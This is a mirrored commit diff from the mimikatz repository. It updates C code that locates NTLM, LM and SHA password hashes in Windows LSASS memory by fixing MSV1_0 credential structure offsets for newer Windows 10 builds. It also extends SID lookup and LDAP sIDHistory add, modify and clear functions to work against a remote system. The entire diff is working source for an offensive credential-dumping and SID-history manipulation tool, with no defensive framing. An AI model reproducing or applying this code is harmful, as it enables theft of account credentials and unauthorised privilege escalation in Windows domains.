mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-01-20 20:10:43 +00:00
[fix #46] MSV structure alignment for Windows 10 > LTSB (LSAISo & normal)
[enhancement] SID/Name lookup & LDAP query now with system arg (not only local/current domain)
This commit is contained in:
Benjamin DELPY
parent
ddb93319a2
commit
9b325b893c
@ -25,7 +25,8 @@ NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
|
||||
PWSTR name, domain;
|
||||
PSID pSid;
|
||||
SID_NAME_USE nameUse;
|
||||
PCWCHAR szName;
|
||||
PCWCHAR szName, szSystem = NULL;
|
||||
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"sid", &szName, NULL))
|
||||
{
|
||||
@ -34,7 +35,7 @@ NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
|
||||
kprintf(L"SID : %s\n", szName);
|
||||
if(IsValidSid(pSid))
|
||||
{
|
||||
if(kull_m_token_getNameDomainFromSID(pSid, &name, &domain, &nameUse))
|
||||
if(kull_m_token_getNameDomainFromSID(pSid, &name, &domain, &nameUse, szSystem))
|
||||
{
|
||||
kprintf(L"Type : %s\n"
|
||||
L"Domain: %s\n"
|
||||
@ -52,7 +53,7 @@ NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
|
||||
else if(kull_m_string_args_byName(argc, argv, L"name", &szName, NULL))
|
||||
{
|
||||
kprintf(L"Name : %s\n", szName);
|
||||
if(kull_m_token_getSidDomainFromName(szName, &pSid, &domain, &nameUse))
|
||||
if(kull_m_token_getSidDomainFromName(szName, &pSid, &domain, &nameUse, szSystem))
|
||||
{
|
||||
kprintf(L"Type : %s\n"
|
||||
L"Domain: %s\n"
|
||||
@ -73,7 +74,10 @@ NTSTATUS kuhl_m_sid_query(int argc, wchar_t * argv[])
|
||||
{
|
||||
PLDAP ld;
|
||||
PLDAPMessage pMessage = NULL;
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, FALSE, &ld, &pMessage))
|
||||
PCWCHAR szSystem = NULL;
|
||||
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
|
||||
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, FALSE, szSystem, &ld, &pMessage))
|
||||
{
|
||||
if(pMessage)
|
||||
ldap_msgfree(pMessage);
|
||||
@ -101,7 +105,7 @@ NTSTATUS kuhl_m_sid_modify(int argc, wchar_t * argv[])
|
||||
if(IsValidSid((PSID) NewSid.bv_val))
|
||||
{
|
||||
NewSid.bv_len = GetLengthSid((PSID) NewSid.bv_val);
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, &ld, &pMessage))
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, NULL, &ld, &pMessage))
|
||||
{
|
||||
kprintf(L"\n * Will try to modify \'%s\' to \'", Modification.mod_type);
|
||||
kull_m_string_displaySID(NewSid.bv_val);
|
||||
@ -139,12 +143,12 @@ NTSTATUS kuhl_m_sid_add(int argc, wchar_t * argv[])
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"new", &szName, NULL))
|
||||
{
|
||||
if(ConvertStringSidToSid(szName, (PSID *) &NewSid.bv_val) || kull_m_token_getSidDomainFromName(szName, (PSID *) &NewSid.bv_val, &domain, NULL))
|
||||
if(ConvertStringSidToSid(szName, (PSID *) &NewSid.bv_val) || kull_m_token_getSidDomainFromName(szName, (PSID *) &NewSid.bv_val, &domain, NULL, NULL))
|
||||
{
|
||||
if(IsValidSid((PSID) NewSid.bv_val))
|
||||
{
|
||||
NewSid.bv_len = GetLengthSid((PSID) NewSid.bv_val);
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, &ld, &pMessage))
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, NULL, &ld, &pMessage))
|
||||
{
|
||||
kprintf(L"\n * Will try to add \'%s\' this new SID:\'", Modification.mod_type);
|
||||
kull_m_string_displaySID(NewSid.bv_val);
|
||||
@ -178,7 +182,7 @@ NTSTATUS kuhl_m_sid_clear(int argc, wchar_t * argv[])
|
||||
LDAPMod Modification = {LDAP_MOD_DELETE, L"sIDHistory", NULL};
|
||||
PLDAPMod pModification[2] = {&Modification, NULL};
|
||||
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, &ld, &pMessage))
|
||||
if(kuhl_m_sid_quickSearch(argc, argv, TRUE, NULL, &ld, &pMessage))
|
||||
{
|
||||
kprintf(L"\n * Will try to clear \'%s\': ", Modification.mod_type);
|
||||
dwErr = ldap_modify_s(ld, ldap_get_dn(ld, pMessage), pModification);
|
||||
@ -282,7 +286,7 @@ void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
|
||||
if((_wcsicmp(pAttribute, L"sIDHistory") == 0))
|
||||
{
|
||||
kull_m_string_displaySID(pBerVal[i]->bv_val);
|
||||
if(kull_m_token_getNameDomainFromSID(pBerVal[i]->bv_val, &name, &domain, &nameUse))
|
||||
if(kull_m_token_getNameDomainFromSID(pBerVal[i]->bv_val, &name, &domain, &nameUse, NULL))
|
||||
{
|
||||
kprintf(L" ( %s -- %s\\%s )", kull_m_token_getSidNameUse(nameUse), domain, name);
|
||||
LocalFree(name);
|
||||
@ -302,14 +306,14 @@ void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
|
||||
}
|
||||
}
|
||||
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PLDAP *ld, PLDAPMessage *pMessage)
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR system, PLDAP *ld, PLDAPMessage *pMessage)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErr;
|
||||
PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
|
||||
if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
|
||||
{
|
||||
if(kuhl_m_sid_getLdapAndRootDN(ld, &dn))
|
||||
if(kuhl_m_sid_getLdapAndRootDN(system, ld, &dn))
|
||||
{
|
||||
*pMessage = NULL;
|
||||
dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);
|
||||
@ -392,12 +396,12 @@ PWCHAR kuhl_m_sid_filterFromArgs(int argc, wchar_t * argv[])
|
||||
return filter;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PLDAP *ld, PWCHAR *rootDn)
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PCWCHAR system, PLDAP *ld, PWCHAR *rootDn)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD dwErr;
|
||||
|
||||
if(*ld = ldap_init(NULL, LDAP_PORT))
|
||||
if(*ld = ldap_init((PWCHAR) system, LDAP_PORT))
|
||||
{
|
||||
if(*rootDn = kuhl_m_sid_getRootDomainNamingContext(*ld))
|
||||
{
|
||||
|
||||
@ -21,7 +21,7 @@ NTSTATUS kuhl_m_sid_clear(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_sid_patch(int argc, wchar_t * argv[]);
|
||||
|
||||
void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage);
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PLDAP *ld, PLDAPMessage *pMessage);
|
||||
BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR system, PLDAP *ld, PLDAPMessage *pMessage);
|
||||
PWCHAR kuhl_m_sid_filterFromArgs(int argc, wchar_t * argv[]);
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PLDAP *ld, PWCHAR *rootDn);
|
||||
BOOL kuhl_m_sid_getLdapAndRootDN(PCWCHAR system, PLDAP *ld, PWCHAR *rootDn);
|
||||
PWCHAR kuhl_m_sid_getRootDomainNamingContext(LDAP *ld);
|
||||
@ -92,7 +92,7 @@ NTSTATUS kuhl_m_token_list_or_elevate(int argc, wchar_t * argv[], BOOL elevate)
|
||||
{
|
||||
if(kull_m_net_CreateWellKnownSid(type, pDomainInfo ? pDomainInfo->Sid : NULL, &pData.pSid))
|
||||
{
|
||||
if(kull_m_token_getNameDomainFromSID(pData.pSid, &name, &domain, NULL))
|
||||
if(kull_m_token_getNameDomainFromSID(pData.pSid, &name, &domain, NULL, NULL))
|
||||
{
|
||||
kprintf(L"%s\\%s\n", domain, name);
|
||||
LocalFree(name);
|
||||
|
||||
@ -197,7 +197,7 @@ void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(co
|
||||
if(enumItem8->Identity && (enumItem8->Identity->Type == ElementType_ByteArray))
|
||||
{
|
||||
kprintf(L"\t\tUser : ");
|
||||
if(kull_m_token_getNameDomainFromSID((PSID) enumItem8->Identity->data.ByteArray.Value, &name, &domain, NULL))
|
||||
if(kull_m_token_getNameDomainFromSID((PSID) enumItem8->Identity->data.ByteArray.Value, &name, &domain, NULL, NULL))
|
||||
{
|
||||
kprintf(L"%s\\%s", domain, name);
|
||||
LocalFree(name);
|
||||
|
||||
@ -125,7 +125,7 @@ VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align2)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context)
|
||||
|
||||
@ -44,8 +44,8 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
//BYTE align2;
|
||||
//BYTE align3;
|
||||
BYTE align2;
|
||||
BYTE align3;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
|
||||
@ -51,7 +51,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, align2)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()
|
||||
|
||||
@ -51,8 +51,8 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
//BYTE align2;
|
||||
//BYTE align3;
|
||||
BYTE align2;
|
||||
BYTE align3;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
|
||||
@ -17,7 +17,7 @@ BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * p
|
||||
{
|
||||
if(GetTokenInformation(hToken, TokenUser, pTokenUser, szNeeded, &szNeeded))
|
||||
{
|
||||
if((result = kull_m_token_getNameDomainFromSID(pTokenUser->User.Sid, pName, pDomain, pSidNameUse)) && pSid)
|
||||
if((result = kull_m_token_getNameDomainFromSID(pTokenUser->User.Sid, pName, pDomain, pSidNameUse, NULL)) && pSid)
|
||||
result = ConvertSidToStringSid(pTokenUser->User.Sid, pSid);
|
||||
}
|
||||
LocalFree(pTokenUser);
|
||||
@ -32,20 +32,20 @@ PCWCHAR kull_m_token_getSidNameUse(SID_NAME_USE SidNameUse)
|
||||
return (SidNameUse > 0 && SidNameUse <= SidTypeLabel) ? SidNameUses[SidNameUse - 1] : L"unk!";
|
||||
}
|
||||
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse)
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system)
|
||||
{
|
||||
BOOL result = FALSE;
|
||||
SID_NAME_USE sidNameUse;
|
||||
PSID_NAME_USE peUse = pSidNameUse ? pSidNameUse : &sidNameUse;
|
||||
DWORD cchName = 0, cchReferencedDomainName = 0;
|
||||
|
||||
if(!LookupAccountSid(NULL, pSid, NULL, &cchName, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
if(!LookupAccountSid(system, pSid, NULL, &cchName, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
{
|
||||
if(*pName = (PWSTR) LocalAlloc(LPTR, cchName * sizeof(wchar_t)))
|
||||
{
|
||||
if(*pDomain = (PWSTR) LocalAlloc(LPTR, cchReferencedDomainName * sizeof(wchar_t)))
|
||||
{
|
||||
result = LookupAccountSid(NULL, pSid, *pName, &cchName, *pDomain, &cchReferencedDomainName, peUse);
|
||||
result = LookupAccountSid(system, pSid, *pName, &cchName, *pDomain, &cchReferencedDomainName, peUse);
|
||||
if(!result)
|
||||
*pDomain = (PWSTR) LocalFree(*pDomain);
|
||||
}
|
||||
@ -56,20 +56,20 @@ BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain
|
||||
return result;
|
||||
}
|
||||
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse)
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system)
|
||||
{
|
||||
BOOL result = FALSE;
|
||||
SID_NAME_USE sidNameUse;
|
||||
PSID_NAME_USE peUse = pSidNameUse ? pSidNameUse : &sidNameUse;
|
||||
DWORD cbSid = 0, cchReferencedDomainName = 0;
|
||||
|
||||
if(!LookupAccountName(NULL, pName, NULL, &cbSid, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
if(!LookupAccountName(system, pName, NULL, &cbSid, NULL, &cchReferencedDomainName, peUse) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
|
||||
{
|
||||
if(*pSid = (PSID) LocalAlloc(LPTR, cbSid * sizeof(wchar_t)))
|
||||
{
|
||||
if(*pDomain = (PWSTR) LocalAlloc(LPTR, cchReferencedDomainName * sizeof(wchar_t)))
|
||||
{
|
||||
result = LookupAccountName(NULL, pName, *pSid, &cbSid, *pDomain, &cchReferencedDomainName, peUse);
|
||||
result = LookupAccountName(system, pName, *pSid, &cbSid, *pDomain, &cchReferencedDomainName, peUse);
|
||||
if(!result)
|
||||
*pDomain = (PWSTR) LocalFree(*pDomain);
|
||||
}
|
||||
|
||||
@ -22,5 +22,5 @@ BOOL CALLBACK kull_m_token_getTokens_handles_callback(HANDLE handle, PSYSTEM_HAN
|
||||
|
||||
BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse);
|
||||
PCWCHAR kull_m_token_getSidNameUse(SID_NAME_USE SidNameUse);
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse);
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse);
|
||||
BOOL kull_m_token_getNameDomainFromSID(PSID pSid, PWSTR * pName, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system);
|
||||
BOOL kull_m_token_getSidDomainFromName(PCWSTR pName, PSID * pSid, PWSTR * pDomain, PSID_NAME_USE pSidNameUse, LPCWSTR system);
|
||||
Loading…
Reference in New Issue
Block a user